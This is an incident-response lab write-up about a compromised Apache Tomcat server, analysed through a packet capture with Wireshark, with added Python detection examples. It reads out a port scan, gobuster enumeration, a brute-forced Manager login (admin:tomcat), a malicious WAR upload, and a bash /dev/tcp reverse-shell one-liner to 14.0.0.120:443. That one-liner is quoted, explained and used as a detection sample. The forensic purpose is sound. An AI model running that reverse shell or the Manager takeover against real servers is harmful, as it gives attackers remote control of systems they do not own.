Scenario
Our SOC team has detected suspicious activity on one of the web servers within the company’s intranet. In order to gain a deeper understanding of the situation, the team has captured network traffic for analysis. This pcap file potentially contains a series of malicious activities that have resulted in the compromise of the Apache Tomcat web server. We need to investigate this incident further.
Tools Used
- Wireshark
Question 1
Given the suspicious activity detected on the web server, the pcap analysis shows a series of requests across various ports, suggesting a potential scanning behavior. Can you identify the source IP address responsible for initiating these requests on our server?
This question is straightforward. Using Wireshark, the first thing I did was go to ‘Statistics > IPv4 Statistics’ and click on ‘All Addresses’.
- Two addresses account for almost all of the traffic: 14.0.0.120 and 10.0.0.112. One of them is the web server itself, so the other is the candidate for the scanner.
- Filtering on ip.src == 14.0.0.120 and reading the Info column shows this address opening connections to one port after another on the server. Narrowing the filter to bare connection attempts, ip.src == 14.0.0.120 && tcp.flags.syn == 1 && tcp.flags.ack == 0, leaves only the probes and makes the sweep across ports obvious. The other high-volume address, 10.0.0.112, is the destination of those probes, i.e. our server.
Answer: 14.0.0.120
Question 2
Based on the identified IP address associated with the attacker, can you ascertain the city from which the attacker’s activities originated?
- Looking up the IP address from question 1 on Whois.com gives the registered owner of the address range and its region, and an IP geolocation lookup narrows that down to a city. Keep in mind that this is the location of the registered range, not necessarily of the person at the keyboard; an attacker behind a proxy or VPN could be anywhere.
Answer: Guangdong
Question 3
From the pcap analysis, multiple open ports were detected as a result of the attacker's scan. Which of these ports provides access to the web server admin panel?
- An open port is one that answers the probe with SYN/ACK, so filtering on the server's replies, ip.src == 10.0.0.112 && tcp.flags.syn == 1 && tcp.flags.ack == 1, lists the open ports directly (a RST/ACK reply means the port is closed). Among the ports that responded to the attacker is 8080, the default HTTP connector port of Apache Tomcat.
- Following the TCP stream of that session, the attacker sent a GET request and the server answered with an HTML page. Reading through that document, we can see information indicating that this was the web server admin panel.
Answer: 8080
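The two filters above answer questions 1 and 3 by eye; the same triage can be scripted over flow records. The block below is an added example, not code from the original write-up or from the challenge: it builds constructed packet records of the kind `tshark -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.dstport -e tcp.flags.str` would export (the two addresses come from the write-up; the probed port list and which ports answer SYN/ACK are assumptions), then finds the source that sprays SYNs across many ports and the ports on the target that answered it.

```python
"""Port-scan triage from per-packet TCP flag records (added example).

Records are constructed to mimic the capture described in the write-up:
14.0.0.120 probing 10.0.0.112. The port list and the set of ports that
answer SYN/ACK are assumptions, not facts from the pcap.
"""
from collections import defaultdict

SCANNER, SERVER = "14.0.0.120", "10.0.0.112"

# Flags as a short string: "S" = bare SYN (probe), "SA" = SYN/ACK (open),
# "RA" = RST/ACK (closed). A port that never replies is usually filtered.
PROBED_PORTS = [21, 22, 23, 25, 80, 110, 143, 443, 445, 3306, 5432, 8080, 8443]
OPEN_PORTS_ASSUMED = {22, 8080}   # constructed: which probes get a SYN/ACK


def build_sample():
    """Constructed packet list: (src, dst, sport, dport, flags)."""
    packets = []
    for i, port in enumerate(PROBED_PORTS):
        sport = 40000 + i
        packets.append((SCANNER, SERVER, sport, port, "S"))
        reply = "SA" if port in OPEN_PORTS_ASSUMED else "RA"
        packets.append((SERVER, SCANNER, port, sport, reply))
    # A normal intranet client: a single connection to the web port only.
    packets.append(("10.0.0.55", SERVER, 50001, 8080, "S"))
    packets.append((SERVER, "10.0.0.55", 8080, 50001, "SA"))
    return packets


def scan_sources(packets, threshold=10):
    """Map (src, dst) -> number of distinct ports hit with bare SYNs, keeping
    only pairs at or above `threshold`. This is the scripted form of
    ip.src == X && tcp.flags.syn == 1 && tcp.flags.ack == 0 in Wireshark."""
    hits = defaultdict(set)
    for src, dst, _sport, dport, flags in packets:
        if flags == "S":
            hits[(src, dst)].add(dport)
    return {pair: len(ports) for pair, ports in hits.items()
            if len(ports) >= threshold}


def open_ports(packets, scanner, target):
    """Ports on `target` that answered `scanner` with SYN/ACK, i.e. the
    scripted form of ip.src == target && tcp.flags.syn == 1 && tcp.flags.ack == 1."""
    return sorted({sport for src, dst, sport, _dport, flags in packets
                   if src == target and dst == scanner and flags == "SA"})


if __name__ == "__main__":
    pkts = build_sample()
    print(scan_sources(pkts))                  # {('14.0.0.120', '10.0.0.112'): 13}
    print(open_ports(pkts, SCANNER, SERVER))   # [22, 8080]
```

The threshold is deliberately a parameter: a legitimate client touching three or four services on one host is normal, a single source touching a dozen distinct ports within seconds is not.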
Question 4
Following the discovery of open ports on our server, it appears that the attacker attempted to enumerate and uncover directories and files on our web server. Which tools can you identify from the analysis that assisted the attacker in this enumeration process?
- Using the filter ip.src == 14.0.0.120 && http, we examine the attacker's HTTP requests. In the packet details pane the User-Agent header reads gobuster. Gobuster is a wordlist-driven tool for brute-forcing directories and files on web servers, and its traffic is recognisable even when the User-Agent is changed: a rapid burst of GET requests for dictionary paths, most of which the server answers with 404.
Answer: gobuster
Question 5
Subsequent to their efforts to enumerate directories on our web server, the attacker made numerous requests trying to identify administrative interfaces. Which specific directory associated with the admin panel was the attacker able to uncover?
- Examining the HTTP requests, we observe both successful GET and POST requests to the /manager directory, the path of Tomcat's Manager web application, which Tomcat protects with HTTP Basic authentication.
Answer: /manager
Question 6
Upon accessing the admin panel, the attacker made attempts to brute-force the login credentials. From the data, can you identify the correct username and password combination that the attacker successfully used for authorization?
- Using the filter http.authbasic || http.authorization, we see every request that carried credentials. Wireshark decodes Basic credentials for us: the http.authbasic field, shown under the Authorization header in the packet details pane, contains the user:password pair, and adding it as a column is the quickest way to list all of the attempts. The successful pair is the one whose request the server answers with 200 OK instead of 401 Unauthorized; here it is the last attempt.
Answer: admin:tomcat
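Wireshark's http.authbasic column does the Base64 decoding for you; when the traffic comes from a proxy log or a tshark export instead, the same pairing of credentials with response codes has to be done by hand. The block below is an added example, not code from the original write-up: the request/response exchanges are constructed (the path, the wrong guesses and their order are assumptions; only the final admin:tomcat pair comes from the write-up), and it recovers the credential that was answered with something other than 401.

```python
"""Recovering a Basic-auth brute force from request/response pairs (added example)."""
import base64
from typing import NamedTuple, Optional, Tuple


class Exchange(NamedTuple):
    path: str
    authorization: Optional[str]   # raw Authorization header, None if absent
    status: int                    # status code of the paired response


def decode_basic(header: Optional[str]) -> Optional[Tuple[str, str]]:
    """Decode 'Basic <base64(user:password)>' the way Wireshark's http.authbasic
    field does. Returns None for missing, non-Basic or malformed headers."""
    if not header:
        return None
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


def basic_header(user: str, password: str) -> str:
    """Build the header a client sends; used only to construct the sample."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


# Constructed sample: the server challenges first (401), the attacker cycles
# through guesses, and the first non-401 marks the pair that worked.
SAMPLE = [
    Exchange("/manager/html", None, 401),
    Exchange("/manager/html", basic_header("admin", "admin"), 401),
    Exchange("/manager/html", basic_header("tomcat", "tomcat"), 401),
    Exchange("/manager/html", basic_header("admin", "password"), 401),
    Exchange("/manager/html", "Bearer not-basic-auth", 401),
    Exchange("/manager/html", basic_header("admin", "tomcat"), 200),
    Exchange("/manager/html/upload", basic_header("admin", "tomcat"), 200),
]


def brute_force_summary(exchanges):
    """Count credentialed attempts and return the first pair that was answered
    with something other than 401/403; that is the pair the attacker kept using."""
    attempts = []
    success = None
    for ex in exchanges:
        creds = decode_basic(ex.authorization)
        if creds is None:
            continue
        attempts.append(creds)
        if success is None and ex.status not in (401, 403):
            success = creds
    return {"attempts": len(attempts), "distinct": len(set(attempts)),
            "success": success}


if __name__ == "__main__":
    print(brute_force_summary(SAMPLE))
```

Pairing on the response code rather than on "the last attempt" matters when the attacker keeps guessing after a hit, or when the tool retries the good pair on other paths, as the last entry of the sample does.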
Question 7
Once inside the admin panel, the attacker attempted to upload a file with the intent of establishing a reverse shell. Can you identify the name of this malicious file from the captured data?
- Since the attacker uploaded a file, we can use the filter http.request.method == POST. Following the TCP stream of the POST to the Manager application shows a multipart/form-data body whose Content-Disposition header carries the filename, JXQOZY.war. Tomcat deploys an uploaded WAR as a new web application, which is how the attacker got their own code running on the server.
Answer: JXQOZY.war
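The filename sits in the multipart body that Follow TCP Stream displays; the block below extracts it programmatically and checks that the content really is an archive. It is an added example, not code from the original write-up: the request is constructed on the pattern of a Tomcat Manager "Deploy WAR" form submission (the upload path, the boundary, the form field name and the elided archive bytes are assumptions; only the filename JXQOZY.war comes from the write-up).

```python
"""Pulling the uploaded filename out of a multipart POST (added example)."""
import re
from typing import Dict, List

# Constructed request. Only the file name is from the capture; the path,
# boundary, field name and the (elided) archive content are assumptions.
SAMPLE_POST = (
    b"POST /manager/html/upload HTTP/1.1\r\n"
    b"Host: 10.0.0.112:8080\r\n"
    b"Authorization: Basic YWRtaW46dG9tY2F0\r\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx7z\r\n"
    b"\r\n"
    b"------WebKitFormBoundaryx7z\r\n"
    b'Content-Disposition: form-data; name="deployWar"; filename="JXQOZY.war"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b"PK\x03\x04<zip bytes elided>\r\n"
    b"------WebKitFormBoundaryx7z--\r\n"
)

ZIP_MAGIC = b"PK\x03\x04"                 # a WAR file is a ZIP archive
DEPLOYABLE = (".war", ".jsp", ".jspx")    # extensions Tomcat executes as code


def upload_parts(raw_request: bytes) -> List[Dict[str, object]]:
    """One record per file part: the filename from Content-Disposition and
    whether the part's content starts with the ZIP signature."""
    head, sep, body = raw_request.partition(b"\r\n\r\n")
    if not sep:
        return []
    m = re.search(rb'boundary="?([^";\r\n]+)', head, re.IGNORECASE)
    if not m:
        return []
    delim = b"--" + m.group(1)
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):        # closing delimiter, nothing follows
            break
        part_head, _, content = chunk.partition(b"\r\n\r\n")
        fm = re.search(rb'filename="([^"]*)"', part_head)
        if fm:
            parts.append({"name": fm.group(1).decode("latin-1"),
                          "zip": content.startswith(ZIP_MAGIC)})
    return parts


def deployable_uploads(raw_request: bytes) -> List[str]:
    """Names of uploaded files that Tomcat would run as code."""
    return [str(p["name"]) for p in upload_parts(raw_request)
            if str(p["name"]).lower().endswith(DEPLOYABLE)]


if __name__ == "__main__":
    print(upload_parts(SAMPLE_POST))        # [{'name': 'JXQOZY.war', 'zip': True}]
    print(deployable_uploads(SAMPLE_POST))  # ['JXQOZY.war']
```

The ZIP-signature check is the cheap sanity test for a WAR: if a file named .war does not start with PK, it is not an archive at all, and if a file with a harmless extension does, it deserves a closer look.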
Question 8
Upon successfully establishing a reverse shell on our server, the attacker aimed to ensure persistence on the compromised machine. From the analysis, can you determine the specific command they are scheduled to run to maintain their presence?
- A reverse shell is a connection the compromised host opens outbound to the attacker's machine, with a shell's input and output attached to it; because the victim initiates the connection, it passes through firewalls that only block inbound traffic. We already know the attacker used a POST request to upload the malicious WAR to the Manager application. Once deployed, the attacker only has to request the new application to trigger it, which is why the upload is followed by a GET request for the deployed path.
- That GET request is what launched the reverse shell. Following the TCP stream on packet 20646 shows the commands the attacker ran over the shell to maintain access, including the command they scheduled to be re-run.
- Reading the one-liner: bash -i starts an interactive shell, >& /dev/tcp/14.0.0.120/443 makes bash itself open a TCP connection to the attacker on port 443 and send stdout and stderr over it (no netcat needed on the victim), and 0>&1 ties stdin to the same socket so the attacker can type commands into it. Port 443 is chosen so the callback blends in with HTTPS traffic.
Answer: /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'
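The same one-liner is what a detection would look for in crontab entries, process command lines or shell history on the host. The block below is an added example, not code from the original write-up: it parses the /dev/tcp callback target out of a command line and only flags it as a reverse shell when an interactive shell and the file-descriptor wiring are present, so a plain /dev/tcp connectivity probe is reported but not flagged. The only real artefact in the sample is the command quoted above; the crontab wrapper and the benign lines are constructed.

```python
"""Flagging bash /dev/tcp reverse shells in command lines (added example)."""
import re
from typing import Dict, List, Optional

# bash opens a socket when a redirection targets /dev/tcp/<host>/<port>.
DEV_TCP = re.compile(r"/dev/(?P<proto>tcp|udp)/(?P<host>[^/\s'\"]+)/(?P<port>\d{1,5})")
# An interactive shell (bash -i, sh -i, ...).
INTERACTIVE = re.compile(r"\b(?:ba|z|da)?sh\s+-i\b")
# stdout/stderr sent to the socket (>& or &>) and/or stdin read from it (0>&1, 0<&1, <&5).
FD_WIRING = re.compile(r"(?:>&|&>)\s*/dev/(?:tcp|udp)/|\b0\s*[<>]&\s*\d|<&\s*\d")

# Constructed sample lines. Only the first is taken from the capture; the
# crontab entry that wraps it and the two benign lines are assumptions.
SAMPLE_LINES = [
    "/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'",
    "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'",
    "bash -c 'echo > /dev/tcp/10.0.0.1/80 && echo reachable'",
    "tar czf /var/backups/tomcat.tgz /opt/tomcat/webapps",
]


def analyze_command(line: str) -> Optional[Dict[str, object]]:
    """Return the callback target and the two shell indicators for a line
    that references /dev/tcp or /dev/udp, or None if it does not."""
    m = DEV_TCP.search(line)
    if not m:
        return None
    return {
        "host": m["host"],
        "port": int(m["port"]),
        "proto": m["proto"],
        "interactive": INTERACTIVE.search(line) is not None,
        "fd_wired": FD_WIRING.search(line) is not None,
    }


def reverse_shell_hits(lines: List[str]) -> List[Dict[str, object]]:
    """Lines that combine a /dev/tcp target, an interactive shell and
    redirected file descriptors; that combination is a reverse shell."""
    hits = []
    for line in lines:
        info = analyze_command(line)
        if info and info["interactive"] and info["fd_wired"]:
            hits.append(dict(info, line=line))
    return hits


if __name__ == "__main__":
    for hit in reverse_shell_hits(SAMPLE_LINES):
        print(f"{hit['host']}:{hit['port']}/{hit['proto']}  <-  {hit['line']}")
```

Requiring all three indicators keeps the rule from firing on the legitimate use of /dev/tcp as a poor man's port check; the callback address and port it extracts are what you would feed straight into a firewall block or a threat-intel lookup.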